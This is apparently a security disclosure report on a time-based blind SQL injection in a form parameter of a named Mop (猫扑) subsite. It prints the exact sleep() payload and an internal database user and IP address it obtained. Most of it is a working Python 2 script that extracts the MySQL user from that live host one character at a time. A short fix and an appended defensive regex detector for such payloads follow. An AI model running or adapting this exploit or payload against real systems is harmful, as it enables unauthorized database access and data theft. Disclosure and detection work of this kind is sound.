Mop (猫扑) subsite: MySQL blind injection

Injection point:

POST https://51auto.mop.com/hclist_/ Family=aaa'+(select(0)from(select(sleep(10)))v)+'bbb&file1=1&happyUserId=-


The Family parameter is injectable (time-based blind injection via sleep()).

MySQL user:

appro2@172.31.2.7

(screenshot: mop_sqli_1.png)



Script attached:

#encoding=utf-8
# Python 2 script: time-based blind extraction of user() one character at a time.
import httplib
import time
import string
import urllib

headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36',
}

# Character set to try for each position: a-z, 0-9, '@', '_', '.'
payloads = list(string.ascii_lowercase)
for i in range(0, 10):
    payloads.append(str(i))
payloads += ['@', '_', '.']

print '[%s] Start to retrieve MySQL User' % time.strftime('%H:%M:%S', time.localtime())

user = ''
for i in range(1, 25):
    found = False
    while found == False:
        for payload in payloads:
            timeout_count = 0
            for j in range(1, 3):  # 2 times to confirm
                try:
                    # sleep(1) only when the i-th character of user() equals the guess
                    params = {
                        'Family': "aaa'+(select(0)from(select(sleep(ascii(mid(user()from(%s)for(1)))=%s)))v)+'bbb" % (i, ord(payload)),
                        'file1': 1,
                        'happyUserId': '-'
                    }
                    # Repeat the payload 5 times so a hit stacks five sleeps and exceeds the 5 s timeout
                    params['Family'] = params['Family'] * 5
                    body = urllib.urlencode(params)
                    conn = httplib.HTTPConnection('51auto.mop.com', timeout=5)
                    conn.request(method='POST', url='/hclist_/', body=body, headers=headers)
                    conn.getresponse().read()
                    conn.close()
                    print '.',
                    break
                except Exception, e:
                    # A timeout means the server slept: the guess was correct
                    timeout_count += 1
                    time.sleep(0.01)
            if timeout_count == 2:
                user += payload
                print '\n[In progress] now user is %s' % user
                found = True
                break

print '\nFinally, MySQL user is', user

Fix:

Filter and validate the parameter input.
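As an added example (not part of the original report), a defender-side check in Python that flags form bodies carrying the quote-breakout-plus-sleep() shape shown above, useful for log review or as a WAF stopgap until the query is parameterized. The field names are the report's; the sample bodies are constructed.

```python
# Added example, not from the original report: a request-body check that flags
# the time-based blind-injection shape sent to the Family parameter above.
import re
from urllib.parse import parse_qs, urlencode

# A quote that closes the original string literal followed by an operator,
# then a MySQL delay function later in the same value. Spaces are optional
# because the report's payload has none: aaa'+(select(0)from(select(sleep(10)))v)+'bbb
QUOTE_BREAK = re.compile(r"['\"]\s*(?:[+);]|and\b|or\b)", re.IGNORECASE)
DELAY_CALL = re.compile(r"\b(?:sleep|benchmark)\s*\(", re.IGNORECASE)

def analyze_body(body):
    """Map each suspicious form field to the number of delay calls it carries.
    A benign body yields an empty dict."""
    hits = {}
    # parse_qs undoes the x-www-form-urlencoded encoding (%27 -> ', %2B -> +)
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            delays = DELAY_CALL.findall(value)
            if delays and QUOTE_BREAK.search(value):
                hits[name] = hits.get(name, 0) + len(delays)
    return hits

# Constructed sample bodies (assumption: same field names as the report).
PROBE = "aaa'+(select(0)from(select(sleep(10)))v)+'bbb"
SAMPLE_BODIES = {
    "benign": urlencode({"Family": "Audi A4", "file1": 1, "happyUserId": "-"}),
    "probe": urlencode({"Family": PROBE, "file1": 1, "happyUserId": "-"}),
    # The report's script repeats its payload 5 times to stack five sleeps
    "script": urlencode({"Family": PROBE * 5, "file1": 1, "happyUserId": "-"}),
}

def scan(bodies=SAMPLE_BODIES):
    """Return the labels of bodies that look like blind-injection traffic."""
    return sorted(label for label, body in bodies.items() if analyze_body(body))

if __name__ == "__main__":
    for label, body in SAMPLE_BODIES.items():
        print(label, analyze_body(body))
```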